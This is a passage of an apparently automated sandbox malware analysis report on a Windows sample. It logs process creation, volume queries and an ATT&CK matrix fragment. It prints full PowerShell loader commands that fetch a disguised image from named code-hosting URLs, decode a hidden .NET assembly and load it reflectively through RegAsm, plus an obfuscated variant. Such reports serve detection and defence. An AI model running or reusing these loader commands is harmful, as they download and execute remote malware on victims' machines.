'<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#ck#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#gc#z#bm#gy#zgbm#gy#zgbm#gy#lwbk#gq#z#bk#gq#lwbk#g8#dwbu#gw#bwbh#gq#cw#v#gk#bqbn#f8#d#bl#hm#d##u#go#c#bn#d8#mq#x#dg#mq#x#dc#mw#1#cc#l##g#cc#a#b0#hq#c#bz#do#lw#v#hi#yqb3#c4#zwbp#hq#a#b1#gi#dqbz#gu#cgbj#g8#bgb0#gu#bgb0#c4#ywbv#g0#lwbz#ge#bgb0#g8#bqbh#gw#bw#v#ge#dqbk#gk#d##v#g0#yqbp#g4#lwbp#g0#zwbf#hq#zqbz#hq#lgbq#h##zw#/#de#n##0#dq#mq#3#di#mw#n#ck#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#i##9#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i##k#gw#aqbu#g
s#cw#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#gk#zg#g#cg#j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##lqbu#gu#i##k#g4#dqbs#gw#kq#g#hs#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c##pq#g#fs#uwb5#hm#d#bl#g0#lgbu#gu#e#b0#c4#rqbu#gm#bwbk#gk#bgbn#f0#og#6#fu#v#bg#dg#lgbh#gu#d#bt#hq#cgbp#g4#zw#o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bz#hq#yqby#hq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#fm#v#bb#fi#v##+#d4#jw#7#c##j#bl#g4#z#bg#gw#yqbn#c##pq#g#cc#p##8#ei#qqbt#eu#ng#0#f8#rqbo#eq#pg#+#cc#ow#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#cwb0#ge#cgb0#ey#b#bh#gc#kq#7#c##dq#k#c##i##g#c##i##g#c##i##g#c##i##g#cq#zqbu#gq#sqbu#gq#zqb4#c##pq#g#cq#aqbt#ge#zwbl#fq#zqb4#hq#lgbj#g4#z#bl#hg#twbm#cg#j#bl#g4#z#bg#gw#yqbn#ck#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#c0#zwbl#c##m##g#c0#yqbu#gq#i##k#gu#bgbk#ek#bgbk#gu#e##g#c0#zwb0#c##j#bz#hq#yqby#hq#sqbu#gq#zqb4#ck#i#b7#c##j#bz#hq#yqby#hq#sqbu#gq#zqb4#c##kw#9#c##j#bz#hq#yqby#hq#rgbs#ge#zw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe Code function: 0_2_00007FF6975A12EC GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_00007FF6975A12EC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A8964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF6975A8964
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A2C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF6975A2C54
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
MITRE ATT&CK Matrix (cells grouped by tactic column; the number in front of a technique is the count badge shown in the report's matrix, a technique without a number is an unmatched placeholder cell)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: 111 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
